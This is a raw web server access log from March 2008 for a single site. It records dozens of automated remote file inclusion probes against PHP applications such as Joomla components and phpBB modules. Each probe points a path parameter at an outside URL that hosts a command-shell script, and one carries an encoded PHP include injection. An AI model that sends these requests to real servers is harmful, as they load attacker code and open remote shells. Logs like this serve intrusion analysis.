202.47.247.136 - - [23/Mar/2008:07:58:21 -0700] "GET /config.php?path_to_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.172.175.102 - - [23/Mar/2008:07:58:22 -0700] "GET /logs/config.php?path_to_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.9.138 - - [23/Mar/2008:07:58:26 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.9.138 - - [23/Mar/2008:07:58:27 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.9.138 - - [23/Mar/2008:07:58:27 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.72.117.156 - - [23/Mar/2008:07:58:36 -0700] "GET /logs/access_080215.log/becommunity/community/index.php?pageurl=http://www.probiotec.com.br//modules/myalbum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.72.117.156 - - [23/Mar/2008:07:58:36 -0700] "GET /becommunity/community/index.php?pageurl=http://www.probiotec.com.br//modules/myalbum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.72.117.156 - - [23/Mar/2008:07:58:37 -0700] "GET /logs/becommunity/community/index.php?pageurl=http://www.probiotec.com.br//modules/myalbum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.217.162 - - [23/Mar/2008:07:58:40 -0700] "GET ///components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.115.217.162 - - [23/Mar/2008:07:58:41 -0700] "GET /logs///components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
70.84.7.82 - - [23/Mar/2008:07:59:38 -0700] "GET /logs/access_080225.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/lingaputra/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:07:59:45 -0700] "GET /logs/access_071229.log/sections/index.php?op=viewarticle&artid=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:07:59:45 -0700] "GET /sections/index.php?op=viewarticle&artid=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:07:59:46 -0700] "GET /logs/sections/index.php?op=viewarticle&artid=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.145.173.210 - - [23/Mar/2008:08:00:15 -0700] "GET /logs/access_080118.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://ticino.altervista.org/images/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.145.173.210 - - [23/Mar/2008:08:00:15 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://ticino.altervista.org/images/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.145.173.210 - - [23/Mar/2008:08:00:16 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://ticino.altervista.org/images/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.253.99.164 - - [23/Mar/2008:08:00:27 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.maak-moet.de/test??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
80.253.99.164 - - [23/Mar/2008:08:00:27 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.maak-moet.de/test??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:01:05 -0700] "GET /logs/access_080101.log/sections/index.php?op=viewarticle&artid=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:01:09 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&p=53//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:01:09 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&p=53//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:01:10 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&p=53//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.47.247.136 - - [23/Mar/2008:08:01:43 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.16.234.34 - - [23/Mar/2008:08:01:59 -0700] "GET /logs/access_080312.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aband.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.16.234.34 - - [23/Mar/2008:08:02:00 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aband.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.16.234.34 - - [23/Mar/2008:08:02:00 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aband.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.151.245.1 - - [23/Mar/2008:08:02:40 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.151.245.1 - - [23/Mar/2008:08:02:40 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.151.245.1 - - [23/Mar/2008:08:02:40 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.241 - - [23/Mar/2008:08:02:56 -0700] "GET /logs/access_071214.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.53.240.146 - - [23/Mar/2008:08:03:13 -0700] "GET /logs/access_071226.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://mos1.altervista.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [23/Mar/2008:08:03:13 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://mos1.altervista.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:03:13 -0700] "GET /logs/access_080228.log/show.php?page=http://www.winiker.net/public_html/oneadmin/_files/puki.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [23/Mar/2008:08:03:13 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://mos1.altervista.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:03:34 -0700] "GET /logs/access_080124.log//www/administrator/components/com_remository/admin.remository.phphttp://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.227.208.240 - - [23/Mar/2008:08:04:20 -0700] "GET /logs/access_080207.log/config.php?path_to_root=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.208.240 - - [23/Mar/2008:08:04:20 -0700] "GET /logs/config.php?path_to_root=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:08:04:22 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:08:04:26 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.25.185.132 - - [23/Mar/2008:08:04:26 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://autogg.it/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
69.25.185.132 - - [23/Mar/2008:08:04:27 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://autogg.it/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:08:04:29 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.227.208.240 - - [23/Mar/2008:08:04:38 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:08:04:50 -0700] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:08:04:50 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:08:04:51 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.21.163.20 - - [23/Mar/2008:08:05:07 -0700] "GET /logs/access_080220.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/cakep_abis/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.21.163.20 - - [23/Mar/2008:08:05:08 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/cakep_abis/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.145.173.210 - - [23/Mar/2008:08:05:17 -0700] "GET /logs/access_080204.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://ticino.altervista.org/images/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:08:05:36 -0700] "GET /logs/access_080313.log//classes/adodbt/sql.php?classes_dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:08:05:42 -0700] "GET /logs/access_071226.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.21.163.20 - - [23/Mar/2008:08:05:44 -0700] "GET /logs/access_080120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/cakep_abis/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:06:38 -0700] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.winiker.net/public_html/oneadmin/_files/puki.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:06:39 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.winiker.net/public_html/oneadmin/_files/puki.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:06:39 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.winiker.net/public_html/oneadmin/_files/puki.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:08:07:08 -0700] "GET /logs/access_080306.log/main.php?s=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:08:07:09 -0700] "GET /main.php?s=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:08:07:09 -0700] "GET /logs/main.php?s=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.200.252.11 - - [23/Mar/2008:08:07:19 -0700] "GET /errors.php?error=http://bocairent.net/phpmyadmin/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:08:07:26 -0700] "GET /logs/access_071216.log/main.php?s=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:08:07:36 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:08:07:36 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:08:07:37 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.169.96.27 - - [23/Mar/2008:08:07:38 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.169.96.27 - - [23/Mar/2008:08:07:38 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.169.96.27 - - [23/Mar/2008:08:07:38 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:08:07:46 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:08:07:46 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:08:07:46 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.169.96.27 - - [23/Mar/2008:08:07:50 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.169.96.27 - - [23/Mar/2008:08:07:50 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.169.96.27 - - [23/Mar/2008:08:07:50 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:08:07:53 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.169.96.27 - - [23/Mar/2008:08:07:57 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:08:07:59 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.169.96.27 - - [23/Mar/2008:08:08:00 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.169.96.27 - - [23/Mar/2008:08:08:01 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.169.96.27 - - [23/Mar/2008:08:08:01 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.169.96.27 - - [23/Mar/2008:08:08:07 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.71.91 - - [23/Mar/2008:08:08:08 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.169.96.27 - - [23/Mar/2008:08:08:18 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.9.138 - - [23/Mar/2008:08:08:24 -0700] "GET /logs/access_080126.log//modules/vwar/admin/admin.php?vwar_root=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.117.225.155 - - [23/Mar/2008:08:08:27 -0700] "GET /logs/access_080220.log///////?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.25.185.132 - - [23/Mar/2008:08:08:41 -0700] "GET /@rfihttp://autogg.it/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
69.25.185.132 - - [23/Mar/2008:08:08:41 -0700] "GET /logs/@rfihttp://autogg.it/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:08:09:19 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:08:09:19 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:08:09:20 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.245.159.231 - - [23/Mar/2008:08:09:41 -0700] "GET /logs/access_080214.log/!scanhttp://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.245.159.231 - - [23/Mar/2008:08:09:42 -0700] "GET /!scanhttp://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.245.159.231 - - [23/Mar/2008:08:09:42 -0700] "GET /logs/!scanhttp://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.137.139.73 - - [23/Mar/2008:08:10:14 -0700] "GET /logs/access.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.137.139.73 - - [23/Mar/2008:08:10:14 -0700] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:08:10:15 -0700] "GET /logs/access_080218.log/index.php?main=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:08:10:15 -0700] "GET /index.php?main=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:08:10:15 -0700] "GET /logs/index.php?main=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:10:45 -0700] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:10:45 -0700] "GET //Neos_Chronos/header.php?base_folder=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:10:45 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:10:54 -0700] "GET /logs/access_071229.log/sections/index.php?op=viewarticle&artid=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:10:55 -0700] "GET /sections/index.php?op=viewarticle&artid=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:10:56 -0700] "GET /logs/sections/index.php?op=viewarticle&artid=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:08:10:57 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:11:09 -0700] "GET /logs/access_080204.log//Neos_Chronos/header.php?base_folder=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:08:11:15 -0700] "GET /logs/access_080306.log//classes/adodbt/errors.php?error=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:08:11:16 -0700] "GET //classes/adodbt/errors.php?error=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:08:11:16 -0700] "GET /logs//classes/adodbt/errors.php?error=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.44.111 - - [23/Mar/2008:08:11:25 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.93 - - [23/Mar/2008:08:11:25 -0700] "GET /logs/access_080122.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
